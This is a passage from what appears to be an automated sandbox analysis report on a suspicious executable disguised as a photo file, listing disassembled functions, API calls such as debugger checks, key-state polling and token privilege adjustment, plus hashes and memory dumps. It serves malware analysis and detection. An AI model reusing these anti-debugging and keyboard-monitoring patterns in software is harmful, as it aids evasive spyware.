                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                • String ID:
                                                                • API String ID: 2579439406-0
                                                                • Opcode ID: 2d85be5bc7d49981f00070ff87de243385e5a0bee35bbd851c644f842e3feafd
                                                                • Instruction ID: b301a1e906b1f7d9ca11dd6e38f7baed51a3f0c0903e97c58ea0cec5e820b13f
                                                                • Opcode Fuzzy Hash: 2d85be5bc7d49981f00070ff87de243385e5a0bee35bbd851c644f842e3feafd
                                                                • Instruction Fuzzy Hash: 312116B8900B04DFD760EF54FE456487BB2BB58300F10643AE409877A0E3B69983CF16
                                                                Function 1000A501 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • IsDebuggerPresent.KERNEL32 ref: 1000C5D5
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1000C5EA
                                                                • UnhandledExceptionFilter.KERNEL32(10017614), ref: 1000C5F5
                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 1000C611
                                                                • TerminateProcess.KERNEL32(00000000), ref: 1000C618
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                • String ID:
                                                                • API String ID: 2579439406-0
                                                                • Opcode ID: 0c6e12013528028966c606dde08bd82a8eb63e0bad2ee112bf7fee5026609698
                                                                • Instruction ID: c5e426f1109fde4803e617754598a24d866d1cc6d4e93cd83816215881de0859
                                                                • Opcode Fuzzy Hash: 0c6e12013528028966c606dde08bd82a8eb63e0bad2ee112bf7fee5026609698
                                                                • Instruction Fuzzy Hash: 5A21BBB8804364EBF741DF28CCC86547BAAFB08314F60811AF40897272E7719A86CB05
                                                                Function 004129C4 Relevance: 7.5, APIs: 5, Instructions: 34keyboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetKeyState.USER32(00000011), ref: 004129D0
                                                                • GetKeyState.USER32(00000002), ref: 004129DC
                                                                • GetKeyState.USER32(00000001), ref: 004129E8
                                                                • GetKeyState.USER32(00000010), ref: 004129F4
                                                                • GetKeyState.USER32(00000012), ref: 00412A00
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: State
                                                                • String ID:
                                                                • API String ID: 1649606143-0
                                                                • Opcode ID: 197e29892acc29fef39ba9c2abde83d79f5b96be4c7294be0ecf86ffd0d4d9ea
                                                                • Instruction ID: 949ad5e6689e118a0c213e275cb85fce128278c1739bf3f03e7775f42f8d6185
                                                                • Opcode Fuzzy Hash: 197e29892acc29fef39ba9c2abde83d79f5b96be4c7294be0ecf86ffd0d4d9ea
                                                                • Instruction Fuzzy Hash: DEE0127AF512BA50FE51219A9E02FF50D256BE0FD4F410053EA84F70C45DD4259325F5
                                                                Function 0040257A Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 285COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00402584
                                                                  • Part of subcall function 00402D76: __EH_prolog3.LIBCMT ref: 00402D7D
                                                                  • Part of subcall function 00446350: _wcslen.LIBCMT ref: 0044639C
                                                                  • Part of subcall function 00446350: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,core\ProtoValue.cpp), ref: 00446405
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ByteCharH_prolog3H_prolog3_MultiWide_wcslen
                                                                • String ID: MainApp.cpp$dns_result_callback OnSpareDNSResult $dns_result_callback OnSpareDNSResult
                                                                • API String ID: 4110972080-187483893
                                                                • Opcode ID: e0060980f09100664e9bf949fa93be05aaa033217e4ac135775da5b3f1ad60de
                                                                • Instruction ID: 3b6d5de6a4b920daf928dca07fc94fb8dbcacc2d8ff8c59b9ab7c0f58b5227ba
                                                                • Opcode Fuzzy Hash: e0060980f09100664e9bf949fa93be05aaa033217e4ac135775da5b3f1ad60de
                                                                • Instruction Fuzzy Hash: 72B1A271900208DFDB10EFA5CD89B9D77B5BF45308F1080AAE909BB2D1DBB86E45CB65
                                                                Function 0044BCC0 Relevance: 6.1, APIs: 4, Instructions: 82fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Find$CloseFileFirst__fseeki64__ftelli64
                                                                • String ID:
                                                                • API String ID: 178322053-0
                                                                • Opcode ID: 7866b158b0c25150697a79410f658a404603fc994b52ccee299c6c864a5ef3ec
                                                                • Instruction ID: 7a6abefc357dffba636317bdeffaa07786d7b77bc2332d7c29b94f9e77942316
                                                                • Opcode Fuzzy Hash: 7866b158b0c25150697a79410f658a404603fc994b52ccee299c6c864a5ef3ec
                                                                • Instruction Fuzzy Hash: CC21CC31B002145BD710FA69AC8576EB3E8EF45725F500A6FF909E7281DE789D0587D8
                                                                Function 0044A310 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memmove.LIBCMT ref: 0044A3AC
                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,00000000,3D09168B,00000000,?), ref: 0044A3FA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: DiskFreeSpace_memmove
                                                                • String ID: Gq@
                                                                • API String ID: 3600921142-3396094832
                                                                • Opcode ID: fe159f4efae91e7e80ef1392ae21b164ea0ad7f4a206fca60413ecd489abd055
                                                                • Instruction ID: 09110ccef70f8c4966c222a43ef3515250806f77aeeb7ca9ac2bc621f240b593
                                                                • Opcode Fuzzy Hash: fe159f4efae91e7e80ef1392ae21b164ea0ad7f4a206fca60413ecd489abd055
                                                                • Instruction Fuzzy Hash: E74148B1D10218EBDF10DF99D94599EF7F9FF44304F00462EE816A7240E778A919CB95
                                                                Function 0044A020 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetSystemInfo.KERNEL32(?), ref: 0044A03A
                                                                • GetVersionExW.KERNEL32(?), ref: 0044A051
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: InfoSystemVersion
                                                                • String ID:
                                                                • API String ID: 1934062620-0
                                                                • Opcode ID: 78377157d7523d4d34255f4fa36340c5dba9622d1e07d278b2a94a84fae1dc95
                                                                • Instruction ID: 9f06344011214c89d9090a3111da602717cdc1477e8bca6874b0b91196f32310
                                                                • Opcode Fuzzy Hash: 78377157d7523d4d34255f4fa36340c5dba9622d1e07d278b2a94a84fae1dc95
                                                                • Instruction Fuzzy Hash: 5A115231A4011C8BDF24EFA4DD45AEEB3F4EB19304F0004EBD909A7201DA359E598F99
                                                                Function 004409D4 Relevance: 3.0, APIs: 2, Instructions: 18timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 004409DB
                                                                  • Part of subcall function 004184FD: GdiplusStartup.GDIPLUS(00000BD4,00000BD8,00000000), ref: 00418602
                                                                  • Part of subcall function 004184FD: _memset.LIBCMT ref: 00418612
                                                                • GetLocalTime.KERNEL32(00000BEC,00000000,00422DC8,00000000,00000830,004227B1,00000001,?,?,00000000,?,00000000), ref: 004409F9
                                                                  • Part of subcall function 00440A5F: __EH_prolog3_GS.LIBCMT ref: 00440A69
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: GdiplusH_prolog3H_prolog3_LocalStartupTime_memset
                                                                • String ID:
                                                                • API String ID: 1760348909-0
                                                                • Opcode ID: 22c6fb5396e6f0a6a1c7ac0213303c59217538fb9408f8dcc8f41196ec1eaaef
                                                                • Instruction ID: f316c609fc03cf84a9844164ddf7ea47ad9324757ec568b031721664fb9d8a31
                                                                • Opcode Fuzzy Hash: 22c6fb5396e6f0a6a1c7ac0213303c59217538fb9408f8dcc8f41196ec1eaaef
                                                                • Instruction Fuzzy Hash: 7CE012B5110745CFE710EF75C51579B7FE4AF1130EF00845DE1A94B181CB796544CBA5
                                                                Function 00460340 Relevance: 1.8, APIs: 1, Instructions: 258COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memset
                                                                • String ID:
                                                                • API String ID: 2102423945-0
                                                                • Opcode ID: 1319253444ff908b392c1450cfe9f56eb0b51e77752e8cb3b737141904c64e75
                                                                • Instruction ID: 854bb6be962ece826903f4492710b682543803f5ed0ae8c7717d022c2bade005
                                                                • Opcode Fuzzy Hash: 1319253444ff908b392c1450cfe9f56eb0b51e77752e8cb3b737141904c64e75
                                                                • Instruction Fuzzy Hash: E3A148309092954ACB28CF6DD8803ADBFE29F85305F1CC6BEC8D4CB296D67C9945CB50
                                                                Function 024718A4 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 024718DC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: AdjustPrivilegesToken
                                                                • String ID:
                                                                • API String ID: 2874748243-0
                                                                • Opcode ID: e9edb1d5be5016bd968b30757f6b7461b19ed8ab857dddf1f7adf76d49f11dba
                                                                • Instruction ID: 7400426315646e3cbe9ba5ba66d6269652e2e6e9e915238532171f95a4c377bb
                                                                • Opcode Fuzzy Hash: e9edb1d5be5016bd968b30757f6b7461b19ed8ab857dddf1f7adf76d49f11dba
                                                                • Instruction Fuzzy Hash: 44F0C0B4A00209AFEB00DFA8C885ABFBBF9FF48304F418559E905DB351D7B0A9448F95
                                                                Function 100018A0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 100018D8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: AdjustPrivilegesToken
                                                                • String ID:
                                                                • API String ID: 2874748243-0
                                                                • Opcode ID: e9edb1d5be5016bd968b30757f6b7461b19ed8ab857dddf1f7adf76d49f11dba
                                                                • Instruction ID: 040ad90355cb0a273dcfa4f8fbf83e3e1174ec4bc9b7d15bd186d8f56e51e7e8
                                                                • Opcode Fuzzy Hash: e9edb1d5be5016bd968b30757f6b7461b19ed8ab857dddf1f7adf76d49f11dba
                                                                • Instruction Fuzzy Hash: 5DF0C0B4A00209AFEB00DFA8C885EBFBBF9FF48304F408559E905DB351D7B0A9448B95
                                                                Function 0041144B Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Iconic
                                                                • String ID:
                                                                • API String ID: 110040809-0
                                                                • Opcode ID: 308e155152902f8ca0b7c0bcbbac95e0b925771054fb1f7906204fe8e13635ca
                                                                • Instruction ID: 8ce152a5a1825b46e8bb175c97480ce23b072a6988bcd16fd8ee6be21cabe433
                                                                • Opcode Fuzzy Hash: 308e155152902f8ca0b7c0bcbbac95e0b925771054fb1f7906204fe8e13635ca
                                                                • Instruction Fuzzy Hash: 24D012311103189FCF019F71DD0AB963BA8AB01B61F04C826F905CA161DBB6D860EF75
                                                                Function 0045DD80 Relevance: .6, Instructions: 608COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f7a648082743a74c3f7f33f4f0c2f9cfafd987ca88f14418d065bdd939138f94
                                                                • Instruction ID: be1e9cdf4f502e49a5c623f7fae09a86eaace8d6f4c60122c1d5d2cd06d927a9
                                                                • Opcode Fuzzy Hash: f7a648082743a74c3f7f33f4f0c2f9cfafd987ca88f14418d065bdd939138f94
                                                                • Instruction Fuzzy Hash: 1D225277E5161A8BDB08CA95CC515D9B3E3BBC8314B1F9129C819E3305EE78BA478BC0
                                                                Function 0042CE65 Relevance: .4, Instructions: 394COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 81ad72493154c6cf05149e4c1e3ebfea530adaf061f9e8b778b953f269f8aadc
                                                                • Instruction ID: 20d5dd8769c9ca154e52b1b00ba87738fccf7948689e63d40e635602c8d2dffc
                                                                • Opcode Fuzzy Hash: 81ad72493154c6cf05149e4c1e3ebfea530adaf061f9e8b778b953f269f8aadc
                                                                • Instruction Fuzzy Hash: AF024C72E002398BCB29CF19D9812D9FBB2BF99300F5582EAC94867355D7746E85CF84
                                                                Function 024764A6 Relevance: .3, Instructions: 339COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9e2ab4374a66237786eb8764cdaa3591b9d815212faac1f1b4de002376f579aa
                                                                • Instruction ID: b5f28419f71343e8a4f6c97d4f2e09d0acf546185bd014017a36edd90d7a77e0
                                                                • Opcode Fuzzy Hash: 9e2ab4374a66237786eb8764cdaa3591b9d815212faac1f1b4de002376f579aa
                                                                • Instruction Fuzzy Hash: 9AF1F271E006298FDB24CF28C9807DDB7B6BB89314F1681EAC95DA7245DB306E85CF91
                                                                Function 100064A2 Relevance: .3, Instructions: 339COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
